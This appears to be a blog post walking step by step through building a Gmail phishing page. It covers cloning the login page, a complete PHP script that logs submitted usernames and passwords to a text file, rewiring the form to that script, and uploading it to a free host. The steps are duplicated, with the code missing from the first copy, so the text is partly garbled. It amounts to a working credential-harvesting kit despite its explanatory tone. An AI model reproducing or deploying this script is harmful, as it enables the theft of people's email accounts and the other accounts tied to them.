1. First the hacker chooses a target. The most popular targets for phishing attacks are e-mail services such as Hotmail and Gmail because they are the most common and once a hacker gets access to your e-mail, he also gets access to a load of other user information for all the other websites you use. In this example we will pretend the hacker chose Gmail as his target.
2. After choosing his target, the hacker will go to the website and save the whole main page. I use Mozilla Firefox ,(highly recommend using this browser for its security and customization.) So I would go to www.gmail.com and click File -> Save page asā¦ , or simply hit <CTR> + S which does this automatically. Choose where you would like to save the web page and hit Save.
3. Once you have it saved, rename ServiceLogin.htm to index.htm. The reason you want to name it āindexā is so when you upload it to a web host and someone goes to your link, the index page is the first page that shows up.
4. Next the hacker would create a PHP script to do his dirty deed of steeling your information. Below is a simple PHP script that logs and stores your login details when you click āSign inā. To see how it works, copy and paste the following code into notepad. Next save it into the same directory as you saved the Gmail page, and name it phish.php. In addition to the phish.php page, create a new empty text file and name it list.txt.
<?php // This marks the beginning of the PHP script.
5. Now the hacker would have to edit the main Gmail page to include his PHP script. To see what the hacker would do, open up the main Gmail page named index.htm with notepad.
6. Hit <CTR> + F , or go to Edit -> Find , type in action and hit āFind Nextā.
7. This will highlight the first occurrence of the word āactionā in the script and you should see the following:
There are two āactionā occurrences in the script so make sure you have the right one by looking at the āform idā name above. Change the link between action = ā ā to phish.php . This will make the form submit to your PHP phish script instead of to Google.After the link you will see the code:
method="post"
Change the word āPOSTā to āGETā so that it looks like method=āGETā. What the GET method does is submit the information you type in through the URL so that the PHP script can log it.
8. Save and close the file.
9. Next the hacker would upload the files up to a free webhost that supports PHP. With a simple Google search you can come up with a bunch that fall under this category.
10. Once all the files are uploaded, you must give writing permissions to the ālist.txtā file. Every hosting company should have a CHMOD option next to each file. Select this option and change the file permission for ālist.txtā to 777. If you canāt figure out how to do this, ask people that use the same host or simply Google something similar to: āyourwebhostname chmodā.
11. Once everything is up and ready to go, go to the link your host provided you for your website and you should see the Gmail page replica. Type in a username/password and click Sign in. This should have redirected you to the real Gmail page.
12. Now go take a look at your list.txt file by going through your hosting file manager or going to http://www.yourwebhosturl.com/youraccount/list.txt. Although this is the most common, the web host you use may provide a different looking URL. Now if I put a username of āmyusernameā and a password of āmypasswordā then ālist.txtā would now look like the following:
As you can see if you fell for this the hacker would have your email and password.
2. After choosing his target, the hacker will go to the website and save the whole main page. I use Mozilla Firefox ,(highly recommend using this browser for its security and customization.) So I would go to www.gmail.com and click File -> Save page asā¦ , or simply hit <CTR> + S which does this automatically. Choose where you would like to save the web page and hit Save.
3. Once you have it saved, rename ServiceLogin.htm to index.htm. The reason you want to name it āindexā is so when you upload it to a web host and someone goes to your link, the index page is the first page that shows up.
4. Next the hacker would create a PHP script to do his dirty deed of steeling your information. Below is a simple PHP script that logs and stores your login details when you click āSign inā. To see how it works, copy and paste the following code into notepad. Next save it into the same directory as you saved the Gmail page, and name it phish.php. In addition to the phish.php page, create a new empty text file and name it list.txt.
<?php // This marks the beginning of the PHP script.
Header(āLocation: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy<mpl=default<mplcache=2 ā); // once you click āSign inā in the fake website, this redirects you to the real Gmail website, making the whole process look more legit.
$handle = fopen(ālist.txtā, āaā); // this tells the server to open the file ālist.txtā and get it ready for appending data. Which in this case is your username and password.
Foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, ā=ā);
fwrite($handle, $value);
fwrite($handle, ā\r\nā);
} // This section simply assigns all the information going through this form to a variable. This includes your username and password.
Fwrite($handle, ā\r\nā); // This writes your details to the file ālist.txtā
fclose($handle); // This simply closes the connection to the file ālist.txtā
exit;
?> // Marks the end of the PHP program.
So far you should see the following in your folder: 
5. Now the hacker would have to edit the main Gmail page to include his PHP script. To see what the hacker would do, open up the main Gmail page named index.htm with notepad.
6. Hit <CTR> + F , or go to Edit -> Find , type in action and hit āFind Nextā.
7. This will highlight the first occurrence of the word āactionā in the script and you should see the following:
method="post"
Change the word āPOSTā to āGETā so that it looks like method=āGETā. What the GET method does is submit the information you type in through the URL so that the PHP script can log it.
8. Save and close the file.
9. Next the hacker would upload the files up to a free webhost that supports PHP. With a simple Google search you can come up with a bunch that fall under this category.
10. Once all the files are uploaded, you must give writing permissions to the ālist.txtā file. Every hosting company should have a CHMOD option next to each file. Select this option and change the file permission for ālist.txtā to 777. If you canāt figure out how to do this, ask people that use the same host or simply Google something similar to: āyourwebhostname chmodā.
11. Once everything is up and ready to go, go to the link your host provided you for your website and you should see the Gmail page replica. Type in a username/password and click Sign in. This should have redirected you to the real Gmail page.
12. Now go take a look at your list.txt file by going through your hosting file manager or going to http://www.yourwebhosturl.com/youraccount/list.txt. Although this is the most common, the web host you use may provide a different looking URL. Now if I put a username of āmyusernameā and a password of āmypasswordā then ālist.txtā would now look like the following:
As you can see if you fell for this the hacker would have your email and password.
0 comments:
Post a Comment